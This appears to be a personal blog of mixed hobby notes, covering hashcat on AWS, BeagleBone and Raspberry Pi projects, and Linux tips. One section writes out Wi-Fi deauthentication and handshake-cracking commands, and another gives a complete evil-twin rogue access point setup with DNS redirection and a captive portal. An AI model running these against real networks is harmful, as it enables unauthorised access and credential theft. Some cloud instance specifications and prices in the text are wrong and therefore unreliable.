hashcat on AWS


A few months ago I installed a GTX 1060 ti 6GB in my desktop PC for hashcat, but I found that I rarely used hashcat to crack hashes. So I decided to use AWS for cracking hashes instead. The Kali (2019.03) distro is already in the AWS Marketplace. I selected the US-West (Oregon) region with a GPU-enabled instance. I am using p2.xlarge and p3.2xlarge instances with Kali; they are generally turned off and are fair enough for my purposes.

It costs 0.9 CAD/h to 31,218 CAD/h with Pay-As-You-Go rates, depending on performance. The entry option is p2.xlarge (1 x Tesla V100, 4 x vCPUs, 61GB RAM), and the high-end option is p3dn.24xlarge (8 x Tesla V100, 256GB GPU Mem, 96 x vCPU with 768GB Mem).

https://aws.amazon.com/ec2/instance-types/p2/
https://aws.amazon.com/ec2/instance-types/p3/

CTF-forensics

I created 4 forensic challenges for a CTF event. These might be interesting for anyone who enjoys learning something new.

Problems

1) What the *uck, where is my password?
Investigate the file and identify the stolen password

2) Hidden Personal Information
Find the leaked personal information

3) Meeting place
Investigate the criminal’s meeting place and the secure code

4) Ransome
Investigate the raw disk image and recover the infected files

https://drive.google.com/file/d/1pvkNyMU_wDtySpxY1ms8onfoYSxNXhkz/view?usp=sharing

PRU and PWM – BBB

Component

  • 1 x BeagleBone Black
  • 1 x BreadBoard
  • 1 x Blue LED
  • 2 x Button
  • 1 x 330Ω Resistor
  • 2 x 1K Resistor
  • 7 x Connection cables

P9_2 – 330Ω – LED (10mm) – P9_14
P9_2 – 1KΩ – P9_23 (GPIO_49) – Button 1
P9_4 – Button 1
P9_4 – Button 2
P9_2 – 1KΩ – P9_27 (GPIO_115) – Button 2

Before I found out about Fritzing, drawing a connection map was time-consuming work. This tool is intuitive and easy to use, and part libraries for the BeagleBone Black can be imported here.

Working Code

We can control the brightness of the LED by implementing Pulse Width Modulation (PWM); thanks to Python, integrating these modules was not too difficult. The two buttons in the circuit modify the duty cycle to change the LED brightness.
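The working code itself is not on the page, so here is an added example of my own (not the author's) that does what the paragraph describes with the Adafruit_BBIO library. It assumes the wiring of the connection map above: LED on P9_14 (a PWM pin), buttons on P9_23 and P9_27 pulled down through the 1K resistors, so a pressed button reads HIGH. The hardware import sits inside the run loop so the duty-cycle logic can be exercised on any machine.

```python
# Added example, not the page's own "Working Code": two buttons step the
# PWM duty cycle of the LED. Pin names follow the connection map above.
import time

LED_PIN, UP_PIN, DOWN_PIN = "P9_14", "P9_23", "P9_27"


class Dimmer:
    """Tracks the PWM duty cycle (0-100 %) and steps it on button presses."""

    def __init__(self, duty=50.0, step=10.0):
        self.duty = float(duty)
        self.step = float(step)
        self._last = {UP_PIN: 0, DOWN_PIN: 0}   # previous level of each button

    def press(self, pin):
        """One press: raise (UP_PIN) or lower (any other pin), clamped to 0..100."""
        delta = self.step if pin == UP_PIN else -self.step
        self.duty = max(0.0, min(100.0, self.duty + delta))
        return self.duty

    def update(self, levels):
        """Feed current button levels {pin: 0/1}; act only on rising edges so a
        held button does not race the duty cycle to the limit."""
        for pin, level in levels.items():
            if level and not self._last[pin]:
                self.press(pin)
            self._last[pin] = level
        return self.duty


def run_on_beaglebone(freq_hz=1000, poll_s=0.02):
    """Hardware loop (assumed Adafruit_BBIO API: PWM.start/set_duty_cycle, GPIO.input)."""
    import Adafruit_BBIO.PWM as PWM
    import Adafruit_BBIO.GPIO as GPIO
    for pin in (UP_PIN, DOWN_PIN):
        GPIO.setup(pin, GPIO.IN)           # external 1K pull-downs, pressed = HIGH
    dimmer = Dimmer()
    PWM.start(LED_PIN, dimmer.duty, freq_hz)
    try:
        while True:
            duty = dimmer.update({p: GPIO.input(p) for p in (UP_PIN, DOWN_PIN)})
            PWM.set_duty_cycle(LED_PIN, duty)
            time.sleep(poll_s)             # 20 ms poll doubles as a cheap debounce
    finally:
        PWM.stop(LED_PIN)
        PWM.cleanup()
        GPIO.cleanup()


if __name__ == "__main__":
    run_on_beaglebone()
```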

retropie

While my Raspberry Pi 4 was being delivered from China, I turned a legacy little gadget into a retro game box just for fun. It could not be too complex, but there was some trial and error as always.


Pre-requisites

Raspberry Pi 3B+
SNES game controllers
16GB+ Micro SD card
RetroPie image
Game ROMs

Configuration

Most settings can be left unchanged, but some mandatory changes may be required depending on the environment.

setting:configuration->raspi-config->1.change user password
setting:configuration->raspi-config->2.network options->WiFi-setting
(make sure the Wi-Fi password does not contain the special character @)
setting:configuration->raspi-config->5.interfacing option->enable ssh

After rebooting, install lightdm for autologin:
$sudo apt-get install lightdm
setting: configuration->raspi-config->3.boot options->4.desktop autologin

If the HDMI interface is the default for sound there is no issue, but using the 3.5mm analogue audio out requires additional configuration changes.

To get audio through the 3.5mm jack: RetroPie configuration > Audio > select option 2 (headphones – 3.5mm jack) > OK > restart system

Additional settings

For un-archiving ROM packages:
$apt-get install unrar-free p7zip

Downloading ROMs

https://nblog.org/rompacks-romsets/
https://raspberrytips.com/download-retropie-roms/
https://github.com/RetroPie/RetroPie-Setup/wiki/First-Installation

enabling temperature sensor

Connection

Beaglebone DHT11

Connect the 3 pins of the DHT11 to the 3.3V, ground and P8_11 headers to initialize the DHT11 sensor, referring to the BeagleBone Black’s cape expansion header information.

DHT11 specifications

Download Python Library for DHT

Adafruit Python DHT Sensor Library

Python3
$sudo apt-get update 
$sudo apt-get install python3-pip 
$sudo python3 -m pip install --upgrade pip setuptools wheel

Setup Library
$sudo pip3 install Adafruit_DHT

Examine the code

$sudo python3 ./AdafruitDHT.py 11 P8_11
Temp=21.0* Humidity=39.0%

#!/usr/bin/python3
import sys
import time
import Adafruit_DHT

# sensor type and header pin come from the command line ("11 P8_11" above),
# defaulting to the DHT11 wired to P8_11
sensor = int(sys.argv[1]) if len(sys.argv) > 2 else 11
pin = sys.argv[2] if len(sys.argv) > 2 else "P8_11"

while True:
    # read_retry() returns (None, None) when every retry fails, so check before formatting
    humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)
    if humidity is None or temperature is None:
        print('Failed to read from sensor, retrying')
    else:
        print('Temp={0:0.1f}*  Humidity={1:0.1f}%'.format(temperature, humidity))
    time.sleep(2)  # the DHT11 needs about 2 s between samples
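As an added example of my own (not from the page or the Adafruit library), this is the decode the library performs on the sensor's five raw bytes before read_retry() hands back a (humidity, temperature) pair, for both the sensor types the library accepts (11 and 22). The byte layout is from the DHT11/DHT22 datasheets (two humidity bytes, two temperature bytes, a checksum equal to the low byte of their sum); the frames are constructed by hand.

```python
# Added example, not the page's code: decode raw DHT frames the way the
# library does, and handle the failed-read case the page's script ignores.

def dht_checksum_ok(frame):
    """Fifth byte must equal the low 8 bits of the sum of the first four."""
    if len(frame) != 5:
        return False
    return (sum(frame[:4]) & 0xFF) == frame[4]


def decode_dht(frame, sensor=11):
    """Return (humidity, temperature), or (None, None) on a corrupt frame,
    which is what read_retry() gives up with after its retries."""
    if not dht_checksum_ok(frame):
        return None, None
    if sensor == 11:
        # DHT11: integer part in bytes 0 and 2; the decimal bytes are ignored here.
        return float(frame[0]), float(frame[2])
    if sensor == 22:
        # DHT22: 16-bit values in tenths; bit 15 of the temperature is the sign.
        humidity = ((frame[0] << 8) | frame[1]) / 10.0
        raw_t = (frame[2] << 8) | frame[3]
        temperature = (raw_t & 0x7FFF) / 10.0
        if raw_t & 0x8000:
            temperature = -temperature
        return humidity, temperature
    raise ValueError("sensor must be 11 or 22")


def format_reading(humidity, temperature):
    """Same output line as the page's script, but safe when a read failed."""
    if humidity is None or temperature is None:
        return "read failed (checksum or timeout)"
    return 'Temp={0:0.1f}*  Humidity={1:0.1f}%'.format(temperature, humidity)


# Constructed frames; 39 % RH / 21 C matches the page's sample output.
DHT11_OK = bytes([39, 0, 21, 0, 60])                 # 39 + 0 + 21 + 0 = 60
DHT11_BAD = bytes([39, 0, 21, 0, 61])                # one bit flipped in transit
DHT22_COLD = bytes([0x01, 0x86, 0x80, 0x5A, 0x61])   # 39.0 %, -9.0 C

if __name__ == "__main__":
    for frame in (DHT11_OK, DHT11_BAD):
        print(format_reading(*decode_dht(frame, 11)))
    print(format_reading(*decode_dht(DHT22_COLD, 22)))
```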

Displaying on LED 7 Segments

Cracking Wi-Fi Password (classic)

Procedure

Scanning -> Capturing the handshake packet / De-authentication -> Cracking

Scanning

#airmon-ng check kill
#airmon-ng start wlan0mon
#airodump-ng wlan0mon

Capturing/De-authentication

#airodump-ng --bssid MACADDRESS -c CHANNEL --write DUMPFILE wlan0mon
#aireplay-ng --deauth 100 -a MACADDRESS wlan0mon (for de-authentication if required)

Cracking/Brute-forcing

#aircrack-ng DUMPFILE -w WORDLIST
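The defender's view of the de-authentication step, as an added example that is not part of the original notes: a detector that parses raw 802.11 management headers (radiotap header already stripped) and alerts when a BSSID receives more deauth/disassoc frames in a short window than a healthy network produces. The window and threshold are assumptions; the frame and timestamps are constructed test data.

```python
# Added example (not from the page): detect a deauth flood from raw
# 802.11 management frames. Window/threshold values are assumptions.
from collections import deque, defaultdict

DEAUTH, DISASSOC = 12, 10   # management-frame subtypes that knock clients off


def parse_mgmt(frame):
    """Return (subtype, src, dst, bssid, reason) for a management frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:   # type 0 = management
        return None
    mac = lambda off: ":".join("%02x" % b for b in frame[off:off + 6])
    reason = int.from_bytes(frame[24:26], "little") if len(frame) >= 26 else None
    # header order: addr1 = destination, addr2 = source, addr3 = BSSID
    return (frame[0] >> 4) & 0xF, mac(10), mac(4), mac(16), reason


class DeauthDetector:
    """Counts deauth/disassoc frames per BSSID over a sliding time window."""

    def __init__(self, window_s=10.0, threshold=20):
        self.window_s, self.threshold = window_s, threshold
        self.hits = defaultdict(deque)

    def feed(self, ts, frame):
        """Return an alert string the moment a BSSID crosses the threshold, else None."""
        parsed = parse_mgmt(frame)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            return None
        _, src, _dst, bssid, reason = parsed
        q = self.hits[bssid]
        q.append(ts)
        while ts - q[0] > self.window_s:          # drop timestamps outside the window
            q.popleft()
        if len(q) == self.threshold:               # fires once per crossing
            return "deauth flood on %s: %d frames in %.0fs (src %s, last reason %s)" % (
                bssid, len(q), self.window_s, src, reason)
        return None


# Constructed test frame: FC c000 (deauth), duration, dst ff:ff:ff:ff:ff:ff,
# src and BSSID 02:aa:bb:cc:dd:01, seq ctrl, reason code 7 (little-endian).
DEAUTH_FRAME = bytes.fromhex("c000" "0000" "ffffffffffff" "02aabbccdd01"
                             "02aabbccdd01" "0000" "0700")


def demo():
    """25 broadcast deauths in 2.5 s against one BSSID: exactly one alert."""
    det = DeauthDetector()
    alerts = [det.feed(i * 0.1, DEAUTH_FRAME) for i in range(25)]
    return [a for a in alerts if a]
```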

build rogue AP

https://dalewifisec.wordpress.com/2013/05/16/evil-twin-access-point-attack-explained/

dnsmasq.conf

interface=wlan0mon
address=/#/10.10.12.1
dhcp-range=10.10.12.2,10.10.12.254,255.255.255.0,1h
dhcp-option=3,10.10.12.1
dhcp-option=6,10.10.12.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Procedure.sh

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo rghostapd -i "wlan0mon" --ssid "secured" -c 6 -pK "SecretPassword"
sudo ifconfig wlan0mon up 10.10.12.1 netmask 255.255.255.0
sudo route add -net 10.10.12.0 netmask 255.255.255.0 gw 10.10.12.1
sudo killall dnsmasq
sudo dnsmasq -C /root/ghostap/dnsmasq.conf -d


sudo sysctl net.ipv4.ip_forward=1
sudo iptables-legacy --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
sudo iptables-legacy --append FORWARD --in-interface wlan0mon -j ACCEPT
#config : /etc/nginx/sites-enabled/captive_portal
sudo service nginx start

small tips (workaround)

When apt-get update or upgrade fails

$sudo apt-get install ntpdate
$sudo ntpdate -v pool.ntp.org 

Enabling Promiscuous mode

 sudo ifconfig eth0 promisc

auto starting ssh service

systemctl enable ssh.service

VMware Fusion full resolution for Linux (Kali)

apt-get install open-vm-tools-desktop fuse

https://www.kali.org/docs/virtualization/install-vmware-tools-kali-guest/

Proxy switcher

https://null-byte.wonderhowto.com/how-to/use-burp-foxyproxy-easily-switch-between-proxy-settings-0196630/

“inconsistent use of tabs and spaces in indentation” in Python

$autopep8 -i my_file.py

vmmon not found

vmware-modconfig --console --install-all
ref:https://kb.vmware.com/s/article/1002411

Set timezone
$timedatectl list-timezones
$sudo timedatectl set-timezone America/Edmonton